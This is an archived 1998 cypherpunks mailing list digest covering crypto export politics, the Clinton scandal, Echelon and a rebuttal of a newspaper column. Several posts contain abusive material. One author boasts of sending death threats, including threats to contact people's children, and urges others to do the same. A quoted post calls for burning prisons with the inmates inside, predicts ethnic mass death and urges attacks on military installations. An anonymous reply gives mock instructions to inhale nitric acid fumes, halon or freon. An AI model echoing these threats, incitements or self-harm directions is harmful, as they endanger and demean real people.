in a project called "VULA" to defeat the apartheid government.
Vula included illegal exports from europe, Soviet training and
home built software.  Vula was successful and the ANC ultimately
won their long war.  Once a terrorist now a freedom fighter.

These facts are not unknown to the Clinton administration.  In
November 1993 TOP Secret document prepared for President Clinton
openly admitted the futility of any government-imposed ban.
According to "IMPACTS OF TELECOMMUNICATIONS AND ENCRYPTION
TECHNOLOGY ON LAW ENFORCEMENT AND INTELLIGENCE COLLECTION:
ASSESSMENT, OPTIONS, AND RECOMMENDATIONS" a ban would "either
(1) discourage criminals from using encryption because they
realized that most products did not provide protection from
wiretaps, or (2) encourage criminals to acquire strong
encryption technology, whether commercial or home made."

Obviously, the administration will not start banning books so
the "home made" option will always apply.  The FBI Director
seems to have forgotten common sense along with the law.  He
certainly has remained silent while the Chinese Army purchased
military encryption systems from his boss.  Freeh, however, has
also remained adamant that crack-pot export restrictions on
printed text must remain.

Mr. Freeh also overlooked one final historical example of a so
called revolutionary type group using encryption and the FBI
Director can thank his job for it.  In April 1775 Paul Revere
read a coded light signal from a Church tower and rode into
history.  The King's men did not intercept nor decode that
message.  The battle of Concord took place and the first shots
of our own revolution were fired.

================================================================
source documents  -

http://www.softwar.net/karn.html
Clinton NSC/State Crypto Book Disk Export

http://www.softwar.net/loral.html
LORAL Commercial Applications of DOD Tech

http://www.softwar.net/inpact.html
TOP SECRET "Impacts of Encryption"

http://www.softwar.net/vula.html
ANC Operation VULA - Freedom Fighers Use Crypto

http://www.softwar.net/moto4.html
1995 MOTOROLA Tooker To Warren Christopher For Crypto To China

http://www.softwar.net/tooker1.html
July 1995 MOTOROLA Thank You For Encryption Export To Ron Brown

http://www.softwar.net/tooker2.html
Feb. 1995 MOTOROLA To Ron Brown - Human Rights and Crypto

http://www.softwar.net/barth95.html
March 1995 MOTOROLA - Encrypted Radios/Iridium For China

http://www.softwar.net/barth94.html
Richard Barth 1994 Secret Letters Email

http://www.softwar.net/barth93.html
Richard Barth 1993 Secret White House Email

http://www.softwar.net/gao176.html
GAO REPORT - ARMS FOR CHINA - CRYPTO FOR CHINA
================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775

Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
4CE66EF8168673DBB980C519E94FB51027FA5FF001D1BB63298A4E5E28906370
1B9713F09BEEF599003431629914FB78B8704B2BB0DDB22DCA21DB900065CA07
5E32CB3CE742D7C6
================================================================
SOFTWAR EMAIL NEWSLETTER                            09/07/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================

**COPYRIGHT NOTICE** In accordance with Title 17 U.S.C. Section 107, any
copyrighted work in this message is distributed under fair use without
profit or payment to those who have expressed a prior interest in
receiving the included information for non-profit research and
educational purposes only.
http://www.law.cornell.edu/uscode/17/107.shtml





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 14 Sep 1998 12:39:26 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809141729.TAA05465@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Why yes, yes you do.  Don't you recognize the black robe, the scythe,
the bony hand, the less-than-cheerful disposition?

See if you can figure it out.  And please hold still for a moment.  Let me
just wind up here with this thing....


At 06:43 PM 9/14/98 +0100, harald.fragner@idg.se wrote:
>Do I know you?
>
>Harald
>
>------------------
>Harald Fragner
>IT-avdelningen, IDG
>Tel: 08-453 60 10
>Fax: 08-453 60 05
>Email: harald.fragner@idg.se
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.HDC.NET>
Date: Mon, 14 Sep 1998 19:36:11 +0800
To: cypherpunks@cyberpass.net
Subject: Predictions: Crime and Criminal Justice in the 21st Century
Message-ID: <35FDD227.4C7D@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



Predictions: Crime and Criminal Justice in the 21st Century

1.      The United States will experience a significant economic 
recession/crisis very close to the turn of the Century.

2.      As the large pool of young people born in the early 1990s 
become teenagers and young adults, there will be a dramatic 
increase in violent crime around the year 2005-2010.

3.      America will experience sporadic civil disorders/riots in 
many of its urban areas during the next 10-15 years -- much of it 
related to racial/ethnic problems.

4.      Terrorist acts by "fringe"/special issue groups will 
increase at a significant rate -- becoming a major law enforcement 
and security problem.

5.      As faith in the criminal justice system declines, there 
will be a rise in vigilante-based incidents where citizens take 
the enforcement of crime problems into their own hands.

6.      Much of middle- and upper-class America will take a 
"retreatist" attitude and move into private high-security 
communities located in suburban or rural areas. Because of 
technological advances, many companies and corporations will also 
move out of the urban environments as well.

7.      Due to many of the predictions listed above, much of law 
enforcement and security in the 21st Century will become 
privatized and contractual. Traditional law enforcement agencies 
will primarily serve urban and rural communities.

8.      Law enforcement will evolve into two major and divergent 
roles: traditional law enforcement and a more specialized 
military tactical role to deal with the growing urban violance 
and terrorist incidents.

9.      Significant violence and unrest will plague our nation's 
prisons. Major prison riots will become a regular occurrence.

10.     With the decrease of the possibility of major global 
warfare, the United States military will take on an increased 
domestic "peace-keeping" role with America's law enforcement 
agencies.



John Young wrote:
> 
> Tim asks:
> 
> >Freeh and Company continue to mumble about "meeting
> >the legitmate needs of law enforcement." What can they
> >be speaking of?
> ...
> >Obviously his side is contemplating domestic crypto restrictions.
> 
> Threat of terrorism will be the impetus for applying national security
> restrictions domestically, for relaxing cold war limitations on spying
> on Americans, for dissolving barriers between law enforcement
> and military/intelligence agencies.
> 
> Technical means for access to encrypted data will probably
> come first in communications, then to stored material. There
> will be an agreement for increased CALEA wiretap funding, which
> is what the two cellular and wired suits against the FBI intend,
> (paralleling what the hardware and software industries want from
> federal buyers of security products).
> 
> This will provide the infrastructural regime for the gov to monitor
> and store domestic traffic as NSA does for the global, using the
> same technology (NSA may provide service to domestic
> LEA as it now does for other gov customers for intel).
> 
> Other access will come through hardware and software for
> computers, paralleling technology developed for telecomm tapping,
> tracking and monitoring.
> 
> Most probably through overt/covert features of microprocessors
> and OS's, as reported recently of Wintel and others, but also
> probably with special chips for DSP and software for modular
> design -- why build from scratch when these handy kits are
> available.
> 
> As noted here, the features will appear first as optional, in response
> to demand from commerce, from parents, from responsible
> institutions, to meet public calls for protection, for privacy, for
> combating threats to the American people.
> 
> Like wiretap law, use of the features for preventative snooping will
> initially require a court order, as provided in several of the crypto
> legislative proposals.
> 
> Like the wiretap orders, gradually there will be no secret court refusals
> for requests to use the technology in the national interest.
> 
> A publicity campain will proclaims that citizens with nothing to hide
> will have nothing to fear. Assurance of safety will be transparent,
> no clicks on the line. In a digital world, home-office devices will send
> lifestyle data to the device manufacturers over the always monitoring
> transparental Net.
> 
> Personal privacy will evaporate almost unnoticeably, as with the tv
> remote control, cp/defcon/bar brag, telephone, fax and forever-lovers
> pillowtalk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@dimensional.com (Alan Westrope)
Date: Mon, 14 Sep 1998 21:14:51 +0800
To: cypherpunks@Algebra.COM
Subject: FBI's valiant fight against Marxism
Message-ID: <rwc/1o9g/chY092yn@dimensional.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

For comic relief, see

http://www.nytimes.com/yr/mo/day/news/arts/groucho-fbi-file.html and

http://www.thenation.com/issue/980928/0928WIEN.HTM

regarding Hoover's investigation of a famed Marxist comic.

(BTW, Obergruppenfuehrer Freeh's characterization of Declan as a
"radical" reminded me of the mathematical quip by that obscure Marxist
comic, Karl:  "To be radical is to go to the root of the equation!")

Cigar jokes are left as an exercise for the reader.

__
Alan Westrope                      PGP    http://www.dim.com/~awestrop
<awestrop@dim.com>                public  http://www.nyx.net/~awestrop
<awestrop@nyx.net>                 key:   also via keyservers & finger
PGP RSA 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNf3NP1RRFMq4NZY5AQGG3gP7BIr4/31xwhpX3Ye4je4z3J3ssQ4ekqJK
Ac+dAs9Mg1okgCXEJvbxuZo32oyKpOlXkCFcnu/xeXUjDJUsVqjwPUHwcLxjHMt4
lvEiomwWfKRvn9ZGWIygDZmRroJ5ZyXQaXNQW5Ao7XUIePN44pT2Ny4nRE0PjsJi
WlD2O5sYqWw=
=ReUo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 22:12:47 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <199809150228.EAA19097@replay.com>
Message-ID: <v03130312b2238b71c134@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:28 PM -0700 9/14/98, Anonymous wrote:

>Sixdegrees could avoid these problems very easily by adding a domain
>verification so that somebody from Netcom can't specify some address at
>toad.com and have it work. They haven't. They haven't because they don't
>care. Saying that some sites have screwed up rDNS and mail domains isn't a
>valid excuse. They can insert exemptions for Hotmail, MSN, Juno, and other
>sites like that if they want. Oh, maybe they have a "phobia" of this, just
>like AOLers apparently have a "phobia" of even making an attempt to use
>English properly, so it's okay.


This is why I have been responding to "sixdedegrees" contacts with threats,
death threats, threats to put them on my spam list, promises to contact
their children, and other such delightful things.

They have become an Internet bomb, exploding in our midst.

Respond to them in kind.

--Tim May

P.S., Anonymous goes on to write:

>Now, since you're all for niceness in the world, you can go jump on Tim
>since he's doing this too.
>
>  From: Tim May <tcmay@got.net>
>  To: Well now I am a Mommy! <xenedra@hotmail.com>, cypherpunks@toad.com
>  Subject: Re: sixdegrees
...

That's right. I say death to Sixdegrees and death to those who spam us.

Kill the fuckers dead. Let Frodo sort them out.

Wiping out the corporate monstrosity that is "Sixdegrees" will be sweet.

--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Mon, 14 Sep 1998 19:47:17 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert
In-Reply-To: <7b77428acf328c029db809968e76c70d@anonymous>
Message-ID: <35FDE268.79F4FF46@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



I love this to death.  Some asshole sends crap data to sixdegrees
including dredged up real email addresses, then when sixdegrees and the
contacts given react in a totally appropriate manner other (?) assholes
berate them for living.  And this one even manages to toss in an
anti-AOL rant where AOL plays no part.

Such witticisms I haven't seen since my kids turned 7.

PHM

HyperReal-Anon wrote:
> 
> On Mon, 14 Sep 1998, sixdegrees wrote:
> 
> >
> > Just a quick update from sixdegrees(tm). Unfortunately Larry
> > Gilbert (irving@pobox.com) asked not to be listed as your
> > contact with sixdegrees.
> >
> > We also wanted to make sure you were aware that you currently
> > have no other confirmed contacts, so it will be hard for you to
> > have a productive sixdegrees experience. As you probably know,
> > without any confirmed contacts, you won't get any results from our
> > networking searches.
> >
> > So, we just wanted to recommend that you head over to
> > http://www.sixdegrees.com , log-in, and go to MY CONTACTS
> > to list additional relationships.
> >
> >
> > ====================================================================
> > PLEASE NOTE: All replies to this address are processed by a computer.
> > If you have any problems, questions or requests send an e-mail to
> > issues@sixdegrees.com and someone will get back to you as soon as
> > possible.
> > ====================================================================
> 
> Since you seem so intent on continuing to spam the Cypherpunks list like
> some AOL luser-wannabe, I have a better idea. Follow this procedure
> exactly to reach enlightenment:
> 
> 1) Open the cases for all your computers.
> 2) Drop your pants.
> 3) Whip it out. In the case of a woman, just squat.
> 4) Spray all your machines.
> 5) If any machines are still working, pour large amounts of concentrated
> nitric acid solution on them. Inhale the resulting vapors.
> 6) Close the door, activate the halon system, sit down, and inhale deeply.
> 7) You will pass out. Within a few minutes, you will see the Grand Poobah
> himself.
> 8) If you do not have a halon system, inhale heavy gasses such as freon.
> 
> We're glad to be of service to clueless AOLholes and clueless
> AOLhole-wannabes everywhere. Have a nice day.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harald.fragner@idg.se
Date: Mon, 14 Sep 1998 14:27:19 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <TFSQQZKI@idg.se>
MIME-Version: 1.0
Content-Type: text/plain



> Why yes, yes you do.  Don't you recognize the black robe, the scythe,
> the bony hand, the less-than-cheerful disposition?
> 
> See if you can figure it out.  And please hold still for a moment.  Let 
> me just wind up here with this thing....

Ultima Online?


------------------
Harald Fragner
IT-avdelningen, IDG
Tel: 08-453 60 10
Fax: 08-453 60 05
Email: harald.fragner@idg.se




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 14 Sep 1998 16:19:47 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <v03130308b222fe51994a@[209.66.100.123]>
Message-ID: <Pine.BSF.3.96.980914210530.6754A-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 14 Sep 1998, Tim May wrote:

>
>[snip the whatever]
>
>Like I said, I'm chortling. What goes around, come around.
>
>And I'm happy that lying sack of shit of a President may escape being
>removed from office. Having him around is a useful reminder, the next best
>thing to the useful policy of letting a corpse hang from the gallows for a
>couple of months.
>
>--Tim May
>
    as much as I think Clinton is a scurrilous excuse for a human being,
    I could not agree with you more.  besides, Al Bore is worse.

    let Clinton hang, pecker and all.

__________________________________________________________________________

    To be a ruler of men, you need at least 12 inches.... 
_________________________________________________________________ attila__




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 14 Sep 1998 20:17:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: a few facts on Presidential peccadillos (fwd)
Message-ID: <199809150119.VAA08631@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: attila <attila@hun.org>
   >
   >       power trippers attract willing victims.
   >
   >
   >   ANSWERS
   >
   >   1.  John F. Kennedy
   >   2.  Bill Clinton
   >   3.  Lyndon B. Johnson
   >   4.  Thomas Jefferson
   >   5.  Bill Clinton
   >   6.  Andrew Jackson
   >   7.  Lyndon B. Johnson
   >   8.  Franklin D. Roosevelt, John F. Kennedy
   >   9.  Warren G. Harding
   >   10. John F. Kennedy
   >   11. Lyndon B. Johnson
   >   12. Lyndon B. Johnson

Clinton is normal?

Cool!
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TM <messiah@jps.net>
Date: Mon, 14 Sep 1998 23:52:55 +0800
To: cypherpunks@toad.com
Subject: Re: Joe Farah 9/14 (Pppbbbttt)
In-Reply-To: <3.0.2.32.19980914230008.007fb830@mailhost.IntNet.net>
Message-ID: <199809150446.VAA18561@smtp1.jps.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ I know this'll never get read by Joe Farah, but what the hell. Gotta
speak up, right? ]

At 08:00 PM 9/14/1998 , Jeff Penrod wrote:
>Americans get what they deserve 	
>
>I love America. 
>
>I love the spacious skies. I love the amber waves of grain, the purple
>mountains' majesties and the fruited plains. But what I love most about
>America is the God-breathed revolutionary spirit that led its founders to
>risk everything in a desperate fight for freedom and a noble effort to
>write the greatest Constitution the world has ever known. 

Yeah right. The Constitution and the Revolution were perpetrated by two
different groups. The Constitution had no revolution behind it. It was
created because the Articles of Confederation provided no central
government, and the republic was floundering. The rich were feeling
threatened by uprisings (like Shay's Rebellion). Alexander Hamilton
(conspicuously missing from your list of ppl who staked their lives), the
*father of the Constitution*, favored a monarchy.

>But something dreadful has happened to that spirit. It's gone. Oh, there's
>a small remnant of people who still have it, understand it and live by it.
>But, apparently, the vast majority of Americans are clueless about it. They
>have no sense of history. They have no connection with their revolutionary
>past. They have no idea of how blessed they are to live with the fleeting
>legacy of freedom they inherited from George Washington, Thomas Jefferson,
>James Madison and our other forefathers who staked their lives, their
>fortunes and their sacred honor in a quest for liberty.

Actually, the Framers of the Constitution made damn sure their fortunes
were covered. Article VI clearly states...

"All Debts contracted and Engagements entered into, before the Adoption of
this Constitution, shall be as valid against the United States under this
Constitution, as under the Confederation."

A large majority of the Framers were owed money by the government under the
Confederation.

Also, Thomas Jefferson was in Paris when the Constitution was written. He
was responsible for the Declaration of Independence (a beautiful piece of
writing, BTW), but not the Constitution.

>Americans have
>grown fat and lazy, content with their material blessings and ignorant of
>their far more important endowment of freedom. 

Americans have growns fat and lazy, content with their material blessings
and ignorant of their exploitation by the captialist society in which they
live.

>It's enough to make you sick. 

Amen.

>Oh, sure, Americans have lots of scapegoats for their ignorance. They've
>been deliberately dumbed down for 30 or more years by government schools
>determined to turn them into mindless robots. They have been the victims of
>media propaganda designed to deceive them and lead them astray. And for a
>generation or more they have been seduced by government plans to instill in
>them an ever-greater sense of dependency. 

They've been preyed upon by monopolies, they've been exploited by
management, and they've been fucked up the ass by big business. Meanwhile,
the largest rift between rich and poor in modern industrialized countries
steadily grows wider... 1% of the population controls 90% of the wealth,
and my future has been leased by old rich white men.

>But those are excuses. The truth is out there. It's more readily available
>to Americans who choose to seek it out than any other people in history.
>Americans are just too busy, blind or comfortable to bother searching for
>it. Most don't even comprehend the way they are being manipulated -- or
>just don't care. In other words, ultimately, they have no one to blame but
>themselves. 

In other words, listen to you, because you have the Truth (c)(r)(tm).

>As an example of what I'm talking about, take the latest polls conducted
>after the release of the Starr report. Most Americans say President Clinton
>is doing a good job and should not resign or be impeached. A CNN/Gallup
>poll released the day the report went public on the Internet placed the
>president's job approval rating at 62 percent, about where it was before
>the report was released. More than half, 58 percent, said Congress should
>vote to censure the president for behavior that has eroded the public's
>respect for his ethics and truthfulness -- a thoroughly meaningless
>gesture, a slap on the wrist with no consequences, the kind of punishment
>Bill Clinton awaits more eagerly than the next class of White House interns. 

So... you would rather go against the people's sovereignty and impose your
own personal political agenda on the public, simply because you don't think
Americans are fit to rule themselves? Hah! Americans will run America, for
good or bad. That's the way the Framers intended it. In fact, I think
they'd be rather pleased to see how political and economic elites have
monopolized this country. The Framers were never big on majority rule.

>Almost 60 percent of those polled said they thought Clinton was fit to be
>president. By what standard? That's the trouble. Americans have no
>standards -- no unchangeable yardsticks by which they measure right and
>wrong, truth from fiction. 

By *their* standard, by their own personal judgement. There's no moral
yardstick, and God help us if there is in the future. Who makes the
yardstick? Who sits down and says, "This is the moral standard in this
country, abide by it or suffer the consequences"?

>Now, I don't put much stock in public opinion surveys. They are often
>conducted by the same corporate media interests whose agenda is
>inextricably tied to bigger and more intrusive government. Nevertheless,
>these surveys are at least an indication that our nation is in grave
>trouble. 

These surveys are an indication that you are outnumbered. America no longer
abides by your wishes... DANG. Cry me a river, Joe.

>What do they tell us? 

People's rating of Pres. Clinton? Some people's rating of Pres. Clinton?

>We've lost our moorings -- just as surely as Bill Clinton has. America is
>morally, politically, intellectually, spiritually adrift. There are no
>anchors aboard. No compasses. The USS America is at the mercy of the winds
>and currents, and most on board don't care. As long as the crew is serving
>them fine food and entertaining them, the passengers don't give a second
>thought to their fate or their ultimate destination. 

Wow.. you manage to turn FORGIVENESS into a total lack of morals in this
country. Bummer if everyone in America doesn't think the way you do.

>In a way, Americans are getting just what they deserve. Their choice of
>leaders reflects their own inadequacies and shortcomings -- their own
>cowardice. 

Yeah... we should go back to REAL presidents... like Harding or Grant, two
worthless sacks of shit voted in by an apathetic public. Or Jefferson, who
was so morally upright he fathered a child or two with his maid. Or
Coolidge, who was a puppet for 19th century monopolies. This country has
been fraught with stupid leaders, from post-Revolutionary times to modern.

>No wonder they look at Bill Clinton without judgment. To hold him
>accountable would mean holding themselves to a standard of accountability.
>They like looking up to see a leader who is every bit as dysfunctional,
>soulless and lost as themselves. It's comforting, in a perverse way.

Would you rather the lies be hidden? Would you rather the massive
coverups... the back-office political wheelings and dealings? Would you
rather the lies and deceit that has plagued humanity since history began be
hidden from view so you can strut around like an over-inflated rooster and
crow to the world "No corruption here! We're the leaders of the free world!
Our fathers would be proud"?

>And
>psychic and material comfort is the only standard by which Americans today
>measure their lives, their liberty and their pursuit of happiness. It's not
>an easy observation or admission to make, my fellow Americans. But somebody
>has to say it. 	

As opposed to what... you think people in the past sat down and thought
"Well, gee, how free am I this year as compared to last year?" Hell no!
They sat down and thought "Goddamnit, I don't have nothin' ta eat and the
corn done died! Damn lawyers!" For most people, it simply didn't matter who
was in office - the laws didn't affect them in the least.

>A daily radio broadcast adaptation of Joseph Farah's commentaries can be
>heard at http://www.ktkz.com/ 	

Yay.

I simply hate it when ppl wax nostalgic about the Framers. They were a
bunch of white guys all trying to cover their own asses, and in the
process, they came up with a government which is stable because it pits
self-interest against self-interest. I will admit that the government they
created was really pretty cool, but people get so damn sloppy about the
*motives* of the Framers it's disgusting! They weren't guardian angels
carrying out the mandate of God, they were businessmen and lawyers - some
of whom had some brilliant political theories.

Also, the Framers were *not* (repeat, NOT) in favor of majority rule. Only
1/6th of the original government was elected by the ppl (the House of
Representatives). In fact, if you read the minutes of the meetings, ppl
pointed to the abuse of Quakers in PA by a majority.

Right then. I feel better now.

What do other ppl think about this?

-----BEGIN PGP SIGNATURE-----
Version: PGP Cyber-Knights Templar build 5.5.3ckt
Comment: Key ID 0x14C4FDE6

iQA/AwUBNf3wdgdZfH4UxP3mEQKEdwCgiSmoYAycs5LUbU/LlePwdFE+2AIAn3xo
Wr8GhbqMP1iwH6p50ewaFEYV
=oDzS
-----END PGP SIGNATURE-----


--
TM(independent software)
http://www.sinnerz.com/tmessiah
PGP Key ID: 4096/1024/0x14C4FDE6
PGP Fingerprint: 1263 DBFD F2C4 77C6 87F2
                 A94A 0759 7C7E 14C4 FDE6

     -export-a-crypto-system-sig -RSA-3-lines-PERL
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 14 Sep 1998 20:52:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Predictions: Crime and Criminal Justice in the 21st Century
Message-ID: <199809150153.VAA08803@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   From: Tim "I have a LOT of gold in my house" May
>
>   America will get what it deserves.
>
>   The inner cities will burn. 10 million ethnics will wipe themselves out.
>   Miami, Chicago, Washington, LA, New York, Atlanta, New Orleans, and a dozen
>   other cities will be like Berlin after the war.
>
>   See "A Clockwork Orange" for details. Today's Ebonics kids will be
>   tomorrow's Droogs.
>
>   Burn the prisons with the inmates locked inside.
>   Then simply execute those who commit the most serious crimes.
>
>   Militias and freedom fighters will have to start hitting U.S. military
>   installations. Many will die. Eventually the military will abandon the
>   Washington elite and will join the freedom fighters.
>
>   Ten million politicians and welfare thieves will be put up against the wall.

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA.

Who woulda thunk Toto was the sane one on the cypherpunks list?

---guy

   Assuming Toto had his Soma supply.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tom@cat.ping.de (Thomas Adams)Thomas Adams <tadams@pobox.com>
Date: Tue, 15 Sep 1998 02:36:32 +0800
To: cypherpunks@Algebra.COM
Subject: Starr report zipped and prepared for offline reading somewhere?
Message-ID: <m0zIhBv-0005MJC@cat.ping.de>
MIME-Version: 1.0
Content-Type: text/plain



You are all writing about Clinton and Monica et al. Dunno what this does here 
but anyway, let me add to the noise:

Is it possible to download the Starr report somewhere, zipped and prepared for 
offline reading?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Penrod <jpenrod@sihope.com> (by way of "Edwin E. Smith" <edsmith@IntNet.net>)
Date: Mon, 14 Sep 1998 22:12:05 +0800
To: PacNewport@aol.com
Subject: Joe Farah 9/14
Message-ID: <3.0.2.32.19980914230008.007fb830@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



Americans get what they deserve 	
		
I love America. 

I love the spacious skies. I love the amber waves of grain, the purple
mountains' majesties and the fruited plains. But what I love most about
America is the God-breathed revolutionary spirit that led its founders to
risk everything in a desperate fight for freedom and a noble effort to
write the greatest Constitution the world has ever known. 

But something dreadful has happened to that spirit. It's gone. Oh, there's
a small remnant of people who still have it, understand it and live by it.
But, apparently, the vast majority of Americans are clueless about it. They
have no sense of history. They have no connection with their revolutionary
past. They have no idea of how blessed they are to live with the fleeting
legacy of freedom they inherited from George Washington, Thomas Jefferson,
James Madison and our other forefathers who staked their lives, their
fortunes and their sacred honor in a quest for liberty. 
Americans have
grown fat and lazy, content with their material blessings and ignorant of
their far more important endowment of freedom. 

It's enough to make you sick. 

Oh, sure, Americans have lots of scapegoats for their ignorance. They've
been deliberately dumbed down for 30 or more years by government schools
determined to turn them into mindless robots. They have been the victims of
media propaganda designed to deceive them and lead them astray. And for a
generation or more they have been seduced by government plans to instill in
them an ever-greater sense of dependency. 

But those are excuses. The truth is out there. It's more readily available
to Americans who choose to seek it out than any other people in history.
Americans are just too busy, blind or comfortable to bother searching for
it. Most don't even comprehend the way they are being manipulated -- or
just don't care. In other words, ultimately, they have no one to blame but
themselves. 

As an example of what I'm talking about, take the latest polls conducted
after the release of the Starr report. Most Americans say President Clinton
is doing a good job and should not resign or be impeached. A CNN/Gallup
poll released the day the report went public on the Internet placed the
president's job approval rating at 62 percent, about where it was before
the report was released. More than half, 58 percent, said Congress should
vote to censure the president for behavior that has eroded the public's
respect for his ethics and truthfulness -- a thoroughly meaningless
gesture, a slap on the wrist with no consequences, the kind of punishment
Bill Clinton awaits more eagerly than the next class of White House interns. 

Almost 60 percent of those polled said they thought Clinton was fit to be
president. By what standard? That's the trouble. Americans have no
standards -- no unchangeable yardsticks by which they measure right and
wrong, truth from fiction. 

Now, I don't put much stock in public opinion surveys. They are often
conducted by the same corporate media interests whose agenda is
inextricably tied to bigger and more intrusive government. Nevertheless,
these surveys are at least an indication that our nation is in grave
trouble. 

What do they tell us? 

We've lost our moorings -- just as surely as Bill Clinton has. America is
morally, politically, intellectually, spiritually adrift. There are no
anchors aboard. No compasses. The USS America is at the mercy of the winds
and currents, and most on board don't care. As long as the crew is serving
them fine food and entertaining them, the passengers don't give a second
thought to their fate or their ultimate destination. 

In a way, Americans are getting just what they deserve. Their choice of
leaders reflects their own inadequacies and shortcomings -- their own
cowardice. 

No wonder they look at Bill Clinton without judgment. To hold him
accountable would mean holding themselves to a standard of accountability.
They like looking up to see a leader who is every bit as dysfunctional,
soulless and lost as themselves. It's comforting, in a perverse way. 
And
psychic and material comfort is the only standard by which Americans today
measure their lives, their liberty and their pursuit of happiness. It's not
an easy observation or admission to make, my fellow Americans. But somebody
has to say it. 	
	
A daily radio broadcast adaptation of Joseph Farah's commentaries can be
heard at http://www.ktkz.com/ 	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Sep 1998 22:56:48 +0800
To: cypherpunks@toad.com
Subject: DoD on Crypto, Echelon, Secrets
Message-ID: <199809150349.XAA28692@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We attended Defense Secretary Cohen's talk today at the Council on 
Foreign Relations in New York City on "Security in a Grave World."

While not included in the prepared text, Secretary Cohen remarked 
in the Q&A on terrorism and encryption policy that Americans will 
have to decide how much privacy they will be willing to give up for 
protection against terrorism, and cited the FBI's similar views on 
the threat of encryption use by terrorists. 

Afterwards I had an informative chat with Kenneth Bacon, 
Assistant Secretary of Defense for Public Affairs, to ask about 
interviewing Secretary Cohen on Echelon, the global electronic 
intercept and surveillance system operated by the National Security 
Agency. 

Mr. Bacon said the Department will not comment on such matters. I 
acknowledged that was the case heretofore, but with intense European 
interest in Echelon, I asked if would it be possible for Secretary 
Cohen to give a statement on the topic.

I noted that Secretary Cohen in his talk today had listed international 
cooperation as a principal need of US defense policy, and that Echelon 
had raised considerable suspicion of US interception and surveillance 
prowess which could inhibit international trust and cooperation. 

I also asked Mr. Bacon if Secretary Cohen could discuss as well the 
possibility of further declassification of secret technology, as with 
the Skipjack encryption algorithm, to enhance US economic security and 
for protection against information espionage. 

Mr. Bacon said that others in the Department would be more appropriate 
to discuss such topics in detail then Secretary Cohen. I asked if anyone 
except the Secretary had authority to discuss Echelon and declassification 
of secret technology. Mr. Bacon would not answer that but suggested I 
send a letter proposing such topics for discussion and the Department 
will respond.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 14 Sep 1998 19:04:46 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert
Message-ID: <7b77428acf328c029db809968e76c70d@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



